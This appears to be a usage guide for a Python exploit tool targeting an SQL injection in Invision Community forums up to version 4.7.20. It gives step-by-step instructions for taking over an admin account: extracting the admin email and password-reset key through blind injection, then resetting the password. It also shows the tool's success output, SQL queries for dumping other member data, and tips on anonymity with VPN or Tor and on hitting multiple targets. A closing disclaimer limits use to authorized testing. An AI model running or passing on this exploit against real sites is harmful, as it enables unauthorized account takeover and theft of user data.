# Usage Guide - Invision Community SQL Injection Exploit

## Table of Contents
1. [Quick Start](#quick-start)
2. [Detailed Setup](#detailed-setup)
3. [Usage Examples](#usage-examples)
4. [Troubleshooting](#troubleshooting)
5. [Understanding the Output](#understanding-the-output)
6. [FAQ](#faq)

## Quick Start

### Prerequisites Check
Before running the exploit, ensure:
- ✅ Python 3.7+ is installed
- ✅ You have authorization to test the target
- ✅ Target is running Invision Community <= 4.7.20
- ✅ Calendar application is installed on target
- ✅ GeoLocation feature is configured

### Installation (5 minutes)

```bash
# 1. Clone the repository
git clone https://github.com/yourusername/invision-sqli-exploit.git
cd invision-sqli-exploit

# 2. Install dependencies
pip install -r requirements.txt

# 3. Run the exploit
python invision-sqli-exploit.py -u http://target.com/forum/
```

## Detailed Setup

### Step 1: Environment Setup

#### For Windows:
```powershell
# Check Python version
python --version

# Create virtual environment (recommended)
python -m venv venv
.\venv\Scripts\activate

# Install dependencies
pip install -r requirements.txt
```

#### For Linux/Mac:
```bash
# Check Python version
python3 --version

# Create virtual environment (recommended)
python3 -m venv venv
source venv/bin/activate

# Install dependencies
pip3 install -r requirements.txt
```

### Step 2: Verify Installation

```bash
# Test if all dependencies are installed
python -c "import requests, colorama; print('All dependencies installed successfully!')"
```

## Usage Examples

### Example 1: Basic Exploitation

```bash
python invision-sqli-exploit.py -u http://vulnerable-site.com/forum/
```

**What happens:**
1. Script fetches CSRF token
2. Extracts admin email via SQL injection
3. Waits for you to request password reset
4. Extracts reset validation key
5. Resets admin password

### Example 2: Verbose Mode (Debugging)

```bash
python invision-sqli-exploit.py -u http://vulnerable-site.com/forum/ -v
```

**Use this when:**
- The exploit isn't working as expected
- You want to see detailed HTTP requests
- You're learning how the exploit works

### Example 3: Testing Against HTTPS Sites

```bash
python invision-sqli-exploit.py -u https://secure-site.com/community/
```

**Note:** SSL verification is disabled by default for testing purposes.

### Example 4: Custom Port

```bash
python invision-sqli-exploit.py -u http://target.com:8080/forum/
```

## Understanding the Output

### Success Output Explained

```
==================================================
Invision Community <= 4.7.20 SQL Injection Exploit
CVE-2025-48932
==================================================
Target: http://example.com/forum/
==================================================
```
↳ **Banner showing target URL**

```
[*] Fetching CSRF token...
[+] CSRF token found: abc123...
```
↳ **CSRF token successfully extracted** - Required for all subsequent requests

```
[*] Step 1: Extracting admin email address...
[*] Extracting data: a
[*] Extracting data: ad
[*] Extracting data: adm
[*] Extracting data: admin@example.com
[+] Admin email: admin@example.com
```
↳ **Real-time extraction progress** - Each character is extracted via binary search

```
[!] Step 2: Manual action required!

Please follow these steps:
1. Navigate to: http://example.com/forum/index.php?/lostpassword/
2. Request a password reset using email: admin@example.com
3. Press ENTER when done...
```
↳ **User interaction needed** - You must manually request password reset

```
[*] Step 3: Extracting password reset validation key...
[*] Extracting data: xyz789...
[+] Reset key: xyz789abc123...
```
↳ **Reset key extracted from database**

```
[*] Step 4: Resetting admin password...

==================================================
[+] EXPLOITATION SUCCESSFUL!
==================================================

Admin credentials:
  Email:    admin@example.com
  Password: Pwned1721234567

You can now login at: http://example.com/forum/index.php?/login/
```
↳ **Exploitation complete** - Use these credentials to login

### Error Output Examples

#### Error: CSRF Token Not Found
```
[-] CSRF token not found in response!
```
**Possible causes:**
- Target URL is incorrect
- Site is down or unreachable
- Invision Community is not installed

**Solution:** Verify the URL and try again

#### Error: Failed to Extract Admin Email
```
[-] Failed to extract admin email!
```
**Possible causes:**
- Calendar application not installed
- GeoLocation feature not configured
- SQL injection is patched

**Solution:** Verify prerequisites are met

#### Error: Password Reset Failed
```
[-] Password reset failed! Unexpected response.
```
**Possible causes:**
- Invalid reset key
- Reset key expired
- Password reset mechanism changed

**Solution:** Try again from the beginning

## Troubleshooting

### Issue 1: "ModuleNotFoundError: No module named 'requests'"

**Solution:**
```bash
pip install -r requirements.txt
```

### Issue 2: "Connection timeout"

**Possible causes:**
- Target server is slow
- Firewall blocking requests
- Network issues

**Solution:**
- Check internet connection
- Try with VPN if geo-blocked
- Increase timeout in code (edit line with `timeout=30`)

### Issue 3: "SSL Certificate Verification Failed"

**Solution:**
The script already disables SSL verification. If still having issues:
```bash
# Set environment variable (Linux/Mac)
export PYTHONHTTPSVERIFY=0

# Set environment variable (Windows)
set PYTHONHTTPSVERIFY=0
```

### Issue 4: Extraction Takes Too Long

**Why it's slow:**
- Binary search requires multiple requests per character
- Network latency affects speed
- 20+ character strings can take several minutes

**Solutions:**
- Use verbose mode to monitor progress
- Ensure stable internet connection
- Be patient - blind SQL injection is inherently slow

### Issue 5: "Permission Denied" Error

**Solution:**
```bash
# Linux/Mac - Make script executable
chmod +x invision-sqli-exploit.py

# Run with python explicitly
python invision-sqli-exploit.py -u http://target.com/
```

## FAQ

### Q1: How long does the exploit take?
**A:** Typically 5-15 minutes depending on:
- Network speed
- Server response time
- Length of admin email and reset key

### Q2: Will this work on patched versions?
**A:** No. Version 4.7.21+ has patched this vulnerability.

### Q3: Can I run this anonymously?
**A:** The script doesn't provide anonymity. Consider:
- Using a VPN
- Using Tor (with proxychains)
- Testing only on authorized systems

### Q4: What if the admin has a complex email?
**A:** The binary search algorithm handles any ASCII characters efficiently.

### Q5: Can I extract other data besides admin email?
**A:** Yes! Modify the SQL query in the code. Example:
```python
# Extract username instead
admin_username = self.sql_injection("SELECT name FROM core_members WHERE member_id=1")

# Extract other users
user2_email = self.sql_injection("SELECT email FROM core_members WHERE member_id=2")
```

### Q6: Does this leave logs?
**A:** Yes! This exploit will:
- Create HTTP access logs
- Generate database query logs
- Potentially trigger security alerts

### Q7: What's the success rate?
**A:** Near 100% if:
- Prerequisites are met
- Target is vulnerable version
- No WAF/IDS is blocking requests

### Q8: Can this be automated for multiple targets?
**A:** Yes, but:
- Only for authorized penetration testing
- Modify the code to accept target list
- Add error handling for batch processing

## Advanced Usage

### Modifying SQL Queries

Edit the `exploit()` method in `invision-sqli-exploit.py`:

```python
# Extract database version
db_version = self.sql_injection("SELECT VERSION()")

# Extract table names
table_name = self.sql_injection("SELECT table_name FROM information_schema.tables LIMIT 1")

# Extract all admin emails
admin_emails = self.sql_injection("SELECT GROUP_CONCAT(email) FROM core_members WHERE member_group_id=4")
```

### Using with Proxy

Modify the `__init__` method to add proxy support:

```python
def __init__(self, target_url, verbose=False):
    # ... existing code ...
    
    # Add proxy configuration
    self.session.proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    }
```

### Custom Timeouts

Increase timeout for slow connections:

```python
# Find all instances of timeout=30 and change to:
timeout=60  # or higher
```

## Getting Help

If you encounter issues not covered here:

1. **Check the GitHub Issues**: Someone may have already solved your problem
2. **Enable Verbose Mode**: Run with `-v` flag for detailed output
3. **Create an Issue**: Provide full error output and steps to reproduce

## Legal Reminder

🚨 **Only use this tool on systems you own or have explicit written permission to test!**

Unauthorized access is illegal and unethical. This tool is for:
- ✅ Educational purposes
- ✅ Authorized penetration testing
- ✅ Security research with permission
- ❌ Unauthorized hacking
- ❌ Malicious activities
- ❌ Breaking the law

**Stay legal. Stay ethical.**
